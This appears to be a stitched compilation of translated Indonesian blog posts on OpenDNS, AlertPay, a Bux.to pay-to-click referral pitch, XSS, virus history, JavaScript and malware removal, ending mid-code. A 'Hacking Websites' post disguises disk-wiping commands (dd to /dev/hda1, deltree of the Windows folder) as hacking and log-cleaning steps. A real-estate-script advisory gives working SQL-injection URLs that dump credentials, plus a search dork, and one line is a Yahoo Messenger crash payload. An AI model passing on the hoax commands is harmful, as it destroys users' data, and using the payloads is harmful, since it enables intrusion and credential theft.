Safe browsing with Open DNS

DNS, or Domain Name System, is an Internet service for networks that use TCP/IP. The service is used to identify a computer by name rather than by number (IP address). In short, DNS converts names into numbers. DNS is decentralized: each region or level of an organization has its own domain.

Open DNS makes it easy for you to manage your DNS, and using Open DNS can improve browsing speed.

208.67.222.222
208.67.220.220

Alertpay

Ever heard of AlertPay? It is understandable if you have not. This payment processor has only recently become widely talked about, since the mass suspension of the Paypal accounts of PTC/PTR program owners. For some reason, Paypal equates PTC/PTR with money-game programs, pyramid schemes, and the like, so they decided that the accounts of PTC/PTR owners had violated Paypal's terms of use. Some PTC/PTR owners used the moment to run off. Fortunately, some still acted in good faith and looked for a way to survive. And one of the ways out chosen to solve the problem with Paypal was to move to another payment processor, AlertPay.

AlertPay at a glance

In general, AlertPay is not very different from Paypal, so I do not need to explain it at length. We can buy or sell products through AlertPay, fund our account, or withdraw the funds in our account.

There are 3 kinds of membership at AlertPay: Personal Account, Premium Account, and Secured Account. For the details, just look here; I can't be bothered to translate it.

AlertPay verification

The AlertPay account verification process is fairly easy. We just upload a scan of our identity card (a passport, KTP, SIM, and the like) and a bill addressed to our home (for example a phone bill, credit card bill, and the like). The first document is used to verify our identity, while the second is used to verify our home address. Once both are uploaded, we just wait for AlertPay to do a manual check (this takes about 1 week, and NO notification is given once the account is verified).

Funding an AlertPay account

There are several ways to fund our AlertPay account. The main ones (and the easy ones for those of us living in Indonesia) are E-Gold, Money Order, and credit card.

Withdrawing AlertPay funds

For withdrawing funds from AlertPay, the options are almost the same as for funding, but unfortunately minus the credit card. We can withdraw our funds by check or through E-Gold. Direct withdrawal via EFT is actually possible, but for now our country is not supported. Perhaps because not many people use AlertPay yet.

AlertPay referrals

Like Paypal, E-Gold, and most other payment processors, AlertPay also runs a referral system. Here, we can earn $5 from each person we refer to AlertPay. Once we have 10 referrals, our commission for each subsequent referral is doubled, to $10.

But….. there are conditions :)

First, our referral must have a Premium or Secured account. And second, they must make transactions of at least $250. Hmmm, I wonder whether that commission can really be counted on :)

Income from Bux.to

We have all seen plenty of advertisements, whether on television, in cinemas, and so on. Unfortunately, we get no financial benefit from viewing ads. On the Internet, however, there is an opportunity to earn online income by viewing certain ads; these are called PTC (Pay To Click) and PTR (Pay To Read) programs.

One interesting PTC program (at least for me at the moment) is Bux.to (aff). Here, each time we view a website ad for 30 seconds, we get $0.01 (or $0.0125 for premium members). As a member, we get a 'quota' of ads for around 14-17 websites each day; in other words, we can potentially receive $0.14 - $0.17 per day.

But the most interesting thing is that we can introduce the Bux.to PTC program to other people and receive a 100% benefit from each of their transactions! So if we have 100 referrals, and each person views 15 ads every day, then you will get a commission of 100 x $0.15 = $15 per day (or $450 per month)! Really attractive, isn't it??

Please register at Bux.to NOW!! Make sure you already have a Paypal account beforehand (read how here).

Note #1:
Actually there is no big risk to worry about (for free members); you do not need to spend a single cent to do this business. You just use a PC with the Internet connection you already have. Besides, you are not required to have in-depth knowledge to run this business. So what are you waiting for, register at Bux.to for FREE now!!

Note #2:
I do not guarantee that Bux.to really pays its members, especially since I personally have not yet reached their minimum payout. So if you decide to invest in their PTC program (for example by upgrading to premium member or buying referrals), do so at your own risk.

Note #3:
For those of you who are reluctant to become someone's referral, thinking "why bother becoming So-and-so's referral… it only benefits So-and-so anyway": understand that everyone who registers at Bux.to certainly becomes someone's referral, whether of the person who actually referred you, or of Bux.to itself, or you are 'sold' (meaning reassigned as a referral) by Bux.to to someone who buys a referral package. Think from your own point of view, there is no need to think about other people's gain, and decide soon whether you want to take this business opportunity or not.

Note #4:
The Bux.to TOS (Terms of Service) has changed: payment is made within 30 working days for premium members and 60 working days for free members. Watch out for this, because it has a big effect on our cashflow.


To register, please click here

What is XSS (Cross Site Scripting)?

XSS (Cross Site Scripting) is one method of exploiting a system. Most often the fault lies in how the scripting on the web page is written, which allows certain characters to be executed on the site.

The exploitation method described here works by manipulating the call to a form or menu on a page of the target site. Usually when we enter a web page, the first thing we see is the main page or main menu of the site. On that main menu or main page there are usually links that lead to deeper pages. To find out what will be requested when we click such a link, look at the bar in the bottom-left corner of your browser. Usually it looks like this:
Example:
http://target.com/index.html?menu=
http://target.com/index.html?menu=

ME FOUND BUG

[+] Every time we open a web page, we send a request to the server. If what we request exists on the server, the browser displays the page we asked for. But what happens if we send a request in the form of a script? The server tries to find what we requested, and if it does not exist on the server, our request is displayed back in our browser.

[+] Scripts that can be used for XSS are:

  • -> HTML
  • -> JavaScript
  • -> VBScript
  • -> Active X
  • -> Flash

Prevention: by filtering, in other words the server is configured not to serve requests that contain characters such as the following:

Char  ;    /    ?    :    @    =    &    <    >    "    #
Code  %3b  %2f  %3f  %3a  %40  %3d  %26  %3c  %3e  %22  %23

Char  {    }    |    \    ^    ~    [    ]    `    %    '
Code  %7b  %7d  %7c  %5c  %5e  %7e  %5b  %5d  %60  %25  %27

So the key point in XSS is that a user can enter data through an input form (for example the form used to post something on a forum) which is later displayed to other users or to the same user. If the programmer does not filter HTML element tags or the markers of other programming languages, the site can easily be cross-site scripted.
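
The filtering described above, next to encoding the value at the moment it is written into the page, as an added example that is not part of the original post. It goes one step beyond the post by showing that the character filter also refuses a legitimate value such as "Q&A", while output encoding displays it safely; the function names and the sample URLs are constructed for illustration.

```javascript
// Added example, not from the original post. All names and sample URLs are constructed.

// Characters the post lists for request filtering.
const FILTERED_CHARS = ';/?:@=&<>"#{}|\\^~[]`%\'';

// Blocklist check as the post describes it: refuse any value containing a listed character.
function containsFilteredChar(value) {
  return [...String(value)].some((ch) => FILTERED_CHARS.includes(ch));
}

// Output encoding: turn HTML metacharacters into entities so the browser
// renders them as text instead of parsing them as markup.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => HTML_ENTITIES[ch]);
}

// Read the "menu" parameter from a request URL (percent-decoding included).
function menuFromUrl(url) {
  return new URL(url).searchParams.get('menu') ?? '';
}

// "Before": the requested name is copied into the error page unchanged,
// which is the reflection the post describes.
function notFoundPageUnsafe(menu) {
  return `<p>Menu "${menu}" was not found.</p>`;
}

// "After": the same page with the value encoded for an HTML text context.
function notFoundPageSafe(menu) {
  return `<p>Menu "${escapeHtml(menu)}" was not found.</p>`;
}

// Constructed sample requests: a plain name, a legitimate name containing
// a filtered character, and a name containing harmless markup.
const SAMPLES = [
  'http://target.com/index.html?menu=news',
  'http://target.com/index.html?menu=Q%26A',
  'http://target.com/index.html?menu=%3Cb%3Enews%3C%2Fb%3E',
];

// Compare the three approaches for every sample request.
function report() {
  return SAMPLES.map((url) => {
    const menu = menuFromUrl(url);
    return {
      menu,
      blockedByFilter: containsFilteredChar(menu),
      unsafe: notFoundPageUnsafe(menu),
      safe: notFoundPageSafe(menu),
    };
  });
}

for (const row of report()) {
  console.log(row);
}
```

Encoding belongs at the point of output and must match the context: this function covers HTML text and quoted attribute values, not script blocks or URLs.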

DoS (Denial of Service) for Yahoo Messenger version 7.5.0.814

DoS (Denial of Service) for Yahoo Messenger version 7.5.0.814 and possibly other versions

Code:
msg:———————————————iframe onload=$InlineAction()>:)

and try sending it to your friends…. (PM)

source: echo.or.id

~ by bolehditerawang

Tribute To The Computer Virus

The first recorded computer virus was known as 'The Creeper'. Known to infect computers running the Tenex operating system, this stone age virus would display,

"I'M THE CREEPER : CATCH ME IF YOU CAN."

This first recorded computer virus originated in the 1970s and could only infect other machines on that intranet (if you could call it that). Soon after, another virus, Elk Cloner, was said to be the first computer virus to infect 'outside the single computer or lab where it was created.' This claim is false, even though the virus is notable because it was created by a high school student who then added it to a game. The game would run normally 49 times, and then on the 50th run it would display the following poem,

"It will get on all your disks. It will infiltrate your chips. Yes it's Cloner! It will stick to you like glue. It will modify RAM too. Send in the Cloner!"

Then the computer would be infected.

Many computer viruses at that time were spread mainly by floppies or other removable media, since networks and the internet were not popular. Some viruses infected the programs located on the disk, or they would install themselves in the boot sector of the computer, ensuring that when the computer was run the virus would run too.

More current viruses are meant to exploit CSS vulnerabilities and are commonly seen attacking well-known and widely used sites such as MySpace or Yahoo.
The following is a timeline of notable computer viruses. This was taken from wikipedia.org and credit goes towards those who contributed to it.


1970-1979

Early 1970s
Creeper virus was detected on ARPANET infecting the Tenex operating system. Creeper gained access independently through a modem and copied itself to the remote system where the message, 'I'M THE CREEPER : CATCH ME IF YOU CAN.' was displayed. The Reaper program, itself a virus, was created to delete Creeper, the creators of both programs are unknown.

1974
Rabbit virus appears infecting other machines via multiplication. Named for the speed at which it clogged the system with copies of itself, reducing system performance, before reaching a threshold and crashing.

1975
Pervading Animal, a game written for the UNIVAC 1108, appeared. It remains a matter of debate whether Pervading Animal represented the first Trojan or an innocent game with unintended bugs.

1980-1989

1980
Jürgen Kraus wrote his master's thesis, Selbstreproduktion bei Programmen (Self-reproduction of programs).

1981
A program called Elk Cloner, written for Apple II systems, was created by Richard Skrenta. Apple II was seen as particularly vulnerable due to the storage of its operating system on floppy disk. Elk Cloner's design, combined with public ignorance about what malware was and how to protect against it, led to Elk Cloner being responsible for the first large-scale computer virus outbreak in history.

1983
The term 'virus' is coined by Frederick Cohen in describing self-replicating computer programs. In 1984 Cohen uses the phrase "computer virus" – as suggested by his teacher Leonard Adleman – to describe the operation of such programs in terms of "infection". He defines a 'virus' as "a program that can 'infect' other programs by modifying them to include a possibly evolved copy of itself."
November 10th, 1983, at Lehigh University, Cohen demonstrates a virus-like program on a VAX11/750 system. The program was able to install itself to, or infect, other system objects.

1986
January: The Brain boot sector virus (aka Pakistani flu) is released to the wild. Brain is considered the first IBM PC compatible virus, and the program responsible for the first IBM PC compatible virus epidemic. The virus is also known as Lahore, Pakistani, Pakistani Brain, as it was created in Lahore, Pakistan by 19 year old Pakistani programmer, Basit Farooq Alvi and his brother Amjad Farooq Alvi.
December 1986: Ralf Burger presented the Virdem model of programs at a meeting of the underground Chaos Computer Club in Germany. The Virdem model represented the first programs that could replicate themselves via addition of their code to executable DOS files in COM format.

1987
Appearance of the Vienna virus, which was subsequently neutralized, the first time this had happened on the IBM platform.[1]
Appearance of Lehigh virus, boot sector viruses such as Yale from USA, Stoned from New Zealand, Ping Pong from Italy, and appearance of first self-encrypting file virus, Cascade. Lehigh was never released to the wild however. A subsequent infection of Cascade in the offices of IBM Belgium led to IBM responding with its own antivirus product development. Prior to this, antivirus solutions developed at IBM were intended for staff use only.
October: The Jerusalem virus, part of the (at that time unknown) Suriv family, is detected in the city of Jerusalem. Jerusalem destroys all executable files on infected machines upon every occurrence of Friday the 13th (except Friday the 13th Nov 1987 making its first trigger date May 13th 1988). Jerusalem caused a worldwide epidemic in 1988.
November: The SCA virus, a boot sector virus for Amigas appears, immediately creating a pandemic virus-writer storm. A short time later, SCA releases another, considerably more destructive virus, the Byte Bandit.

1988
June: The Festering Hate, Apple, ProDOS virus spreads from underground pirate BBS systems and starts infecting mainstream networks.
November 2: The Morris worm, created by Robert Tappan Morris, infects DEC VAX and Sun machines running BSD UNIX connected to the Internet, and becomes the first worm to spread extensively "in the wild", and one of the first well-known programs exploiting buffer overrun vulnerabilities.

1989
October 1989: Ghostball, the first multipartite virus, is discovered by Friðrik Skúlason

1990-1999

1990
Mark Washburn working on an analysis of the Vienna and Cascade viruses with Ralf Burger develops the first family of polymorphic virus: the Chameleon family. Chameleon series debuted with the release of 1260.

1992
Michelangelo was expected to create a digital apocalypse on March 6th, with millions of computers having their information wiped according to mass media hysteria surrounding the virus. Later assessments of the damage showed the aftermath to be minimal.

1995
The "Concept virus", the first Macro virus, is created.

1996
"Ply" - DOS 16-bit based complicated polymorphic virus appeared with built-in permutation engine.

1998
June 2: The first version of the CIH virus appears.

1999
March 26: The Melissa worm is released, targeting Microsoft Word and Outlook-based systems, and creating considerable network traffic.
June 6: The ExploreZip worm, which destroys Microsoft Office documents, is first detected.
The Happy99 worm invisibly attached itself to emails. It displayed fireworks to hide the changes being made and wished you a happy new year. It modified system files related to Outlook Express and Internet Explorer on Windows 95 and Windows 98.

2000 and later

2000
May: The VBS/Loveletter ('ILOVEYOU') worm appeared. As of 2004 this is the most costly virus to business, causing upwards of 10 billion dollars in damage. The backdoor trojan to the worm, Barok, was created by Filipino programmer Onel de Guzman; it is not known who created the attack vector or who (inadvertently) unleashed it; de Guzman himself denies being behind the outbreak although he suggests he may have been duped by someone using his own Barok code as a payload.
Zmist - Z0mbie's fully metamorphic, code integrating virus.

2001
January: A worm strikingly similar to the Morris worm, named the Ramen worm infected only Red Hat Linux machines running version 6.2 and 7, using three vulnerabilities in wu-ftpd, rpc-statd and lpd.
March: Simile - published in nr 6 29A e-zine, written by The Mental Driller in assembly language multi-OS, metamorphic virus.
May 8: The Sadmind worm spreads by exploiting holes in both Sun Microsystems Solaris (Security Bulletin 00191) and Microsoft Internet Information Services (MS00-078).
July: The Sircam worm is released, spreading through e-mails and unprotected network shares.
July 13: The Code Red worm attacking the Index Server ISAPI Extension in Microsoft Internet Information Services with a vulnerability described in MS01-033, is released.
August 4: A complete re-write of the Code Red worm, Code Red II begins aggressively spreading, primarily in China.
September 18: The Nimda worm is discovered and spreads through a variety of means including vulnerabilities described in MS01-044 and backdoors left by Code Red II and Sadmind worm.
October 26: The Klez worm is first identified.

2003
January 24: The SQL slammer worm also known as the Sapphire worm, attacked vulnerabilities in Microsoft SQL Server and MSDE described in MS02-039 and MS02-061, causes widespread problems on the Internet.
August 12: The Blaster worm, also known as the Lovesan worm, spread rapidly by exploiting Microsoft Windows computers vulnerable to exploits first described in MS03-026 and later in MS03-039.
August 18: The Welchia (Nachi) worm is discovered. The worm tries to remove the blaster worm and patch Windows.
August 19: The Sobig worm (technically the Sobig.F worm) spread rapidly via mail and network shares.
October 24: The Sober worm is first seen and maintains its presence until 2005 with many new variants.
The simultaneous attack on network weak points by the Blaster and Sobig worms caused a massive amount of damage.


2004
Late January: MyDoom emerges, and currently holds the record for the fastest-spreading mass mailer worm.
March 19: The Witty worm is a record-breaking worm in many regards. It exploited holes in several Internet Security Systems (ISS) products. It was the fastest disclosure to worm, it was the first internet worm to carry a destructive payload and it spread rapidly using a pre-populated list of ground-zero hosts.
May 1: The Sasser worm emerges by exploiting a vulnerability in LSASS described in MS04-011 and causes problems in networks, even interrupting business in some cases.
December: Santy, the first known "webworm" is launched. It exploited a vulnerability in phpBB described in BID10701 and used Google in order to find new targets. It infected around 40000 sites before Google filtered the search query used by the worm, preventing it from spreading.

2005
August 16: The Zotob worm and several variations of malware exploiting the vulnerability described in MS05-039 are discovered. The effect was overblown because several United States media outlets were infected.
October 13: The Samy virus became the fastest spreading virus as of 2006.

2006
January 20: The Nyxem worm was discovered. It spread by mass-mailing. Its payload, which activates on the third of every month, starting on February 3, attempts to disable security-related and file sharing software, and destroy files of certain types, such as Microsoft Office files.
February 16: Discovery of the first-ever virus for Mac OS X, a low-threat worm known as OSX/Leap-A or OSX/Oompa-A, is announced.[1]
Mid-June: Precursor to the "w0rm.EricAndrew" worm is released on the popular website MySpace. The worm spread through visits to profiles, copying itself through a Quicktime security hole into the "Music" section of the victim's profile. The worm, known as the "lOrdOfthenOOse" worm, changed display names to "lOrdOfthenOOse" and did not allow the name to be changed. The worm was defeated in 2 ways. The primary way was through removing the code from the profile. The way it was eradicated, however, was through the removal of the link by the webmaster of the website the virus was uploaded to. It was eradicated 4 days after release. No damage was caused, but it was estimated that 70% of all MySpace, or over 70 million profiles, were infected with the worm. A patch was released from Quicktime specifically for Myspace users to prevent a worm being spread in this manner again.
June 28: Investigators stated that Essebar may have authored more than 20 other viruses including the Mydoom variant, Mydoom-BG, and the Zotob-related Mytob worm.[2]

2007
January 7: A worm generated by hackers of the popular website MySpace was discovered by many users on the site. Some sites were unaffected while others showed display names of w0rm.EricAndrew. The hackers, Eric and Andrew changed wordings and added to others' sites.
January 17: Peacomm Trojan identified as a fast-spreading email spamming threat thought to have originated from Russia. It disguises itself as a news email about bogus news stories and asks you to download an attachment which it claims is a film.

javaScript Functions explained

Oh well, I made this topic because I've seen a lot of code here being misused.

So what is a function?

A function is a block of code that performs a routine or process. It can return a value, or return nothing at all and just execute a block of code. It can also accept arguments (parameters). A function must not be duplicated in a document (which may contain more than one JavaScript). However, it can be called many times.

Here are some examples of the syntax. foo can be anything, provided it doesn't begin with a number and contains only letters and underscores.

A function that executes code:

function foo() {
    alert("hi");
}

How to call it:

foo();

This will show an alert with the message "hi".

A function that executes code but requires a parameter:

function foo(message) {
    alert(message);
}

How to call it:

foo("hi");

This will show an alert with the message "hi".

A function that returns a value:

function foo() {
    return "hi";
}

How to call it:

alert(foo());

This will show an alert with the message "hi".

A function that returns a value but requires a parameter:

function foo(message) {
    if (message) return true;
    return false;
}

How to call it:

alert(foo("hi"));

This will show an alert with the message "true".


So now you know how to use a function. As I said, a function must not be duplicated; it will cause bugs if you do.

Why use functions?
Basically we want our code short. In practice we use a function so that we can execute the same code many times without writing the same code again.









Hacking Websites: Fun or Terror? hhaha

With a proper understanding of the relevant programming languages such as C, C++, Perl, Java etc., one can be fully equipped with the technique of hacking into a website. There are backdoors for the web hackers for website hacking. For hacking web sites, one of the best ways for the hacker is to install Linux on the personal computer he or she wants to hack from. Then he can open up a shell to type: dd if=/dev/zero of=/dev/hda1 and press ENTER. As the next step he will type: dd hf= (url). There are a few other alternatives for hacking sites as well. The web hackers using a Windows PC can also master the art of hacking websites with the flicking of a finger.

The first step is to clean up the tracks so that the feds fail to trace out the hacker. This happens automatically in case of linux. Cleaning up of tracks in case of Windows 95 or Windows 98 or Windows ME involves a step-by step procedure. Click Start then Run and then Command. In case of Windows NT or Windows 2000 the Tracks can be cleaned by pressing Start, then Run and then cmd. The next step is to clean up tracks with deltree c:/windows or c:\winnt, or whatever the main windows directory is. At the command prompt, press y, which will then go through and clean up the system's logs. The hackers should perform the same steps again after the hacking sites/hacking wireless internet sites. Then after this cleaning up the hackers should type: ping -l4000 (url).

BackTrack 3 - Final Release

Max Moser to BugTraq:

BackTrack 3 Final - Release Information

Released yesterday exclusively on pauldotcom.com

Muts, Martin and I have slaved for weeks and months, together with the help of many remote-exploit’ers to bring you this fine release. As usual, this version overshadows the previous ones with extra cool things.

SAINT

SAINT has provided BackTrack users with a functional version of SAINT, pending a free request for an IP range license through the SAINT website, valid for 1 year.

Maltego

The guys over at Paterva have created a special version of Maltego v2.0 with a community license especially for BackTrack users. We would like to thank Paterva for co-operating with us and allowing us to feature this amazing tool in BackTrack.

Nessus

Tenable would not allow for redistribution of Nessus on BackTrack 3.

Kernel

2.6.21.5. Yes, yes, stop whining….We had serious deliberations concerning the BT3 kernel. We decided not to upgrade to a newer kernel as wireless injection patches were not fully tested and verified. We did not want to jeopardize the awesome wireless capabilities of BT3 for the sake of sexiness or slightly increased hardware compatibilities. All relevant security patches have been applied.

Tools

As usual, updated, sharpened, SVN’ed and armed to the teeth. This release we have some special features such as spoonwep, fastrack and other cool additions.

Availability

For the first time we distribute three different versions of Backtrack 3

- CD version

- USB version

- VMWare version

BackTrack 3 final download page is here:

http://remote-exploit.org/backtrack_download.html

Final Requests

We request the community to not mirror or torrent this release, or otherwise distribute it online without our knowledge.

We are trying to gather statistics about bt3 downloads. If you would like to mirror BT3 then please:

1) Think again! Traffic generated by BT3 downloads is CRAZY.

2) Please contact us before doing so.

3) Send us monthly statistics of downloads for the iso.

If you would like to add a link to BackTrack downloads to your website, please use:

http://www.remote-exploit.org/backtrack_download.html as the download link.

Rants

Problems, fixes, bugs, opinions - should all end up in our Remote Exploit community forums, and our wiki:

http://forums.remote-exploit.org

http://wiki.remote-exploit.org

Relative Real Estate Systems - Sql Injection Vulnerability

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Relative Real Estate Systems
version : <= 3.0
Vendor : http://www.dboorn.com/estate/
Description : Elegant real estate script that allows for unlimited listings and agents with featured listings, unlimited photos, advanced search engine, user login option, user tracking, dynamic slide shows, Mls/Idx support, multiple agents with photo, mortgage calculator, schools info, C.M.A. request form, full admin panel. Requires PHP/Mysql Windows Server or any Web server with php support.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Input passed to the "listing_id" parameter in index.php is not properly verified before being used in an sql query. This can be exploited thru the browser to manipulate SQL queries and pull the username and password from realtors and users in plain text. Successful exploitation requires that "magic_quotes" is off.

Poc/Exploit:
~~~~~~~~~~

http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat
(id,0x3a,username,0x3a,password,0x3a,email),0,1,2,3,4,5,6,7,8,9,0,1%20from%20realtors--


http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat
(username,0x3a,password),0,1,2,3,4,5,6,7,8,9,0,1%20from%20users--


Admin Login at http://[URL]/[PATH]/Admin/login_index.php


Dork:
~~~~~
Google : "index.php?go=listings&listing"



Solution:
~~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
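
One way to carry out the first Solution item, as an added example that is not the vendor's code and is written in JavaScript rather than the product's PHP: accept "listing_id" only as a single positive integer and hand it to the database as a bound parameter. The `listings` table name, the function names and the sample query strings are assumptions made for illustration.

```javascript
// Added example, not the vendor's code. Table name, function names and
// sample query strings are assumptions for illustration.

// Allow-list: 1 to 9 decimal digits, no sign, no spaces, no leading zero.
const LISTING_ID_PATTERN = /^[1-9][0-9]{0,8}$/;

// Extract and validate listing_id from a raw query string.
function parseListingId(queryString) {
  const values = new URLSearchParams(queryString).getAll('listing_id');
  // Reject a missing parameter and a repeated one: with duplicates, different
  // layers of a stack may each pick a different copy.
  if (values.length !== 1) {
    throw new RangeError('listing_id must be supplied exactly once');
  }
  if (!LISTING_ID_PATTERN.test(values[0])) {
    throw new RangeError('listing_id must be a positive integer');
  }
  return Number(values[0]);
}

// The SQL text is a constant; the value travels separately as a bound
// parameter, so it can never change the structure of the statement.
function buildListingQuery(queryString) {
  const id = parseListingId(queryString);
  return {
    text: 'SELECT * FROM listings WHERE listing_id = ?', // hypothetical table
    values: [id],
  };
}

// Wrapper that reports the outcome instead of throwing.
function check(queryString) {
  try {
    return { ok: true, query: buildListingQuery(queryString) };
  } catch (err) {
    return { ok: false, reason: err.message };
  }
}

// Constructed sample inputs; the second is a shortened form of the value
// shown in the advisory.
const SAMPLE_QUERIES = [
  'go=listings&listing_id=30',
  'go=listings&listing_id=-30%20union%20select%201',
  'go=listings&listing_id=30&listing_id=31',
  'go=listings',
];

for (const qs of SAMPLE_QUERIES) {
  console.log(qs, '->', JSON.stringify(check(qs)));
}
```

Validation plus bound parameters does not depend on the magic_quotes setting, which PHP removed in version 5.4.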


Timeline:
~~~~~~~~~

- 24 - 06 - 2008 bug found
- 24 - 06 - 2008 vendor contacted
- 24 - 06 - 2008 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, zautha - my little warrior
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
kuntua, stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

How to remove a Trojan, Virus, or other Malware

Table of Contents

1. Diallers, Trojans, Viruses, Worms Oh My!
2. How these infections start
3. How to remove these infections
4. How to protect yourself in the future
5. Conclusion


Dialers, Trojans, Viruses, and Worms Oh My!

If you use a computer, read the newspaper, or watch the news, you will know about computer viruses or other malware. These are those malicious programs that once they infect your machine will start causing havoc on your computer. What many people do not know is that there are many different types of infections that are categorized in the general category of Malware.

Malware - Malware is programming or files that are developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain types of adware.

This article will focus on malware that is considered to be viruses, trojans, or worms, though this information can be used to remove the other types of malware as well. We will not go into specific details about any one particular infection, but rather provide a broad overview of how these infections can be removed. For the most part these instructions should allow you to remove a good deal of infections, but there are some that need special steps to be removed, and these won't be covered in this tutorial.

Before we continue it is important to understand the generic malware terms that you will be reading about.

Adware - A program that generates popups on your computer or displays advertisements. It is important to note that not all adware programs are necessarily considered malware. There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information is provided up front then they are generally not considered malware.

Backdoor - A program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.

Dialler - A program that typically dials a premium rate number that has per minute charges over and above the typical call charge. These calls are with the intent of gaining access to pornographic material.

Hijackers - A program that attempts to hijack certain Internet functions, like redirecting your start page to the hijacker's own start page, redirecting search queries to an undesired search engine, or replacing search results from popular search engines with their own information.

Spyware - A program that monitors your activity or information on your computer and sends that information to a remote computer without your knowledge.

Trojan - A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoor to your system.

Virus - A program that when run, has the ability to self-replicate by infecting other programs and files on your computer. These programs can have many effects ranging from wiping your hard drive, displaying a joke in a small box, or doing nothing at all except to replicate itself. These types of infections tend to be localized to your computer and not have the ability to spread to another computer on their own. The word virus has incorrectly become a general term that encompasses trojans, worms, and viruses.

Worm - A program that when run, has the ability to spread to other computers on its own using either mass-mailing techniques to email addresses found on your computer or by using the Internet to infect a remote computer using known security holes.


How these infections start

Just like any program, in order for the program to work, it must be started. Malware programs are no different in this respect and must be started in some fashion in order to do what they were designed to do. For the most part these infections run by creating a configuration entry in the Windows Registry in order to make these programs start when your computer starts.

Unfortunately, though, in the Windows operating system there are many different ways to make a program start, which can make startup entries difficult for the average computer user to find manually. Luckily for us, though, there are programs that allow us to cut through this confusion and see the various programs that are automatically starting when Windows boots. The program we recommend for this, because it's free and detailed, is Autoruns from Sysinternals.

When you run this program it will list all the various programs that start when your computer is booted into Windows. For the most part, the majority of these programs are safe and should be left alone unless you know what you are doing or know you do not need them to run at startup.

At this point, you should download Autoruns and try it out. Just run Autoruns.exe and look at all the programs that start automatically. Don't uncheck or delete anything at this point. Just examine the information to get an overview of the number of programs that are starting automatically. When you feel comfortable with what you are seeing, move on to the next section.

How to remove these infections

We have finally arrived at the section you came here for. You are most likely reading this tutorial because you are infected with some sort of malware and want to remove it. With this knowledge that you are infected, it is also assumed that you examined the programs running on your computer and found one that does not look right. You did further research by checking that program against our Startup Database or by searching in Google and have learned that it is an infection and you now want to remove it.

If you have identified the particular program that is part of the malware, and you want to remove it, please follow these steps.

1. Download and extract the Autoruns program by Sysinternals to C:\Autoruns

2. Reboot into Safe Mode so that the malware is not started when you are doing these steps. Many malware programs monitor the keys that allow them to start and, if they notice a key has been removed, will automatically replace that startup key. For this reason booting into Safe Mode allows us to get past that defense in most cases.

3. Navigate to the C:\Autoruns folder you created in Step 1 and double-click on autoruns.exe.

4. When the program starts, click on the Options menu and enable the following options by clicking on them. This will place a checkmark next to each of these options.

1. Include empty locations

2. Verify Code Signatures

3. Hide Signed Microsoft Entries

5. Then press the F5 key on your keyboard to refresh the startups list using these new settings.

6. The program shows information about your startup entries in 8 different tabs. For the most part, the filename you are looking for will be found under the Logon or the Services tabs, but you should check all the other tabs to make sure it is not loading elsewhere as well. Click on each tab and look through the list for the filename that you want to remove. The filename will be found under the Image Path column. There may be more than one entry associated with the same file, as it is common for malware to create multiple startup entries. It is important to note that many malware programs disguise themselves by using the same filenames as valid Microsoft files. It is therefore important to know exactly which file you want to remove and which folder it is in. You can check our Startup Database for that information or ask for help in our computer help forums.

7. Once you find the entry that is associated with the malware, you want to delete that entry so it will not start again on the next reboot. To do that, right-click on the entry and select Delete. This startup entry will now be removed from the Registry.

8. Now that we have made sure it will not start on boot up, you should delete the file using My Computer or Windows Explorer. If you cannot see the file, it may be hidden. To allow you to see hidden files you can follow the steps for your operating system found in this tutorial:

How to see hidden files in Windows

9. When you are finished removing the malware entries from the Registry and deleting the files, reboot into normal mode as you will now be clean from the infection.
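The check described in step 6 can also be run over a saved Autoruns listing. The following is an added example, not part of the original tutorial: it flags entries whose signature is not verified and entries that reuse a Windows filename from the wrong folder. The CSV column names, the sample rows and the short `EXPECTED_DIR` list are assumptions made for illustration.

```python
import csv
import io
from ntpath import basename, dirname, normcase  # Windows path rules on any OS

# Constructed sample rows; column names are assumed to match an Autoruns CSV export.
SAMPLE_CSV = r'''Entry Location,Entry,Enabled,Signer,Image Path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Audio Panel,enabled,(Verified) Example Vendor Inc.,C:\Program Files\Example\panel.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run,Updater,enabled,(Not verified) Example Soft,C:\Users\demo\AppData\Roaming\updater.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Host Service,enabled,(Not verified) Microsoft Corporation,C:\Users\demo\AppData\Local\Temp\svchost.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Shell,enabled,(Verified) Microsoft Corporation,C:\WINDOWS\explorer.exe
'''

# Short illustrative list of Windows filenames and the folder each belongs in,
# assuming Windows is installed in C:\Windows. Extend it for your own systems.
EXPECTED_DIR = {
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}


def triage(csv_text):
    """Return (entry, image path, reasons) for every startup entry worth a closer look."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["Image Path"]
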